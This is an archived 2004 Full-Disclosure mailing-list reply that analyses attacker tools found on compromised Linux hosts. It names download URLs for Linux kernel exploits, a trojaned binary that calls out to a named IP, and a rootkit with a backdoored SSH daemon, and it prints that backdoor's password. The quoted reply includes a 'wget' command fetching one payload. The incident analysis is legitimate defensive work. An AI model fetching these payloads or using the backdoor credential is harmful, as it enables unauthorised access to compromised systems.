[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Automated ssh scanning

To: "Ron DuFresne" <dufresne@xxxxxxxxxxxxx>, "Gary E. Miller" <gem@xxxxxxxxxx>
Subject: Re: [Full-Disclosure] Automated ssh scanning
From: "VeNoMouS" <venom@xxxxxxxxxxx>
Date: Fri, 27 Aug 2004 13:40:01 +1200

lol the amount of people still trying to work out what these binarys are is amusing, i already broke down what each package was and mailed it to full disclosure over 24hrs ago, dont you people read threads?

I'll post it again.....

www.bo2k-rulez.net/a kernel do_brk exploit by isec - http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php, infected with rst.b , which when run tries to connect to 207.66.155.21 on port 80 requesting /~telecom69/gov.php which is offline.

www.corbeanu.as.ro/t.gz Ptrace/kmod kernel exploit by isec - http://www.k-otik.com/exploits/03.30.kernel.c.php

http://roarmy.com/god.tgz
root kit with backdoor'd ssh listens on port 26000 which replaces smbd
binary, loggin of the ssh connections goes to /usr/include/iceconf.h , also
has a crappy tcp sniffer which logs to /usr/lib/libice.log,and a syn flooder

***** backdoor password for this ssh door is ice4budu

www.generatiapro.go.ro/fast.tgz
emech setup for undernet to join #tty.

----- Original Message ----- From: "Ron DuFresne" <dufresne@xxxxxxxxxxxxx> To: "Gary E. Miller" <gem@xxxxxxxxxx> Cc: "Deigo Dude" <deigodude@xxxxxxx>; <full-disclosure@xxxxxxxxxxxxxxxx> Sent: Friday, August 27, 2004 11:59 AM Subject: Re: [Full-Disclosure] Automated ssh scanning

Howdy Gary,
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Yo All!

On Thu, 26 Aug 2004, Deigo Dude wrote:

> Maybe running this test again, and this time ...

No need to run the test again.

- From the .history I duplicated this:

wget www.bo2k-rulez.net/a

Then did this to see the strings in the binary:

strings a | less

This string looked ineresting:

Kernel seems not to be vulnerable

A google on that string yields the exloit:

http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php

A simple exploit for the well known do_brk bug in the Linux kernel...
Cool, I was incrrect in assuning this was a fully patched system and the
compromise likely being an application sploit it appears.
Thanks,
Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] Automated ssh scanning
  - From: Tremaine

References:
- Re: [Full-Disclosure] Automated ssh scanning
  - From: Ron DuFresne

Prev by Date: [Full-Disclosure] MDKSA-2004:087 - Updated kernel packages fix multiple vulnerabilities
Next by Date: Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning
Previous by thread: Re: [Full-Disclosure] Automated ssh scanning
Next by thread: Re: [Full-Disclosure] Automated ssh scanning
Index(es):
- Date
- Thread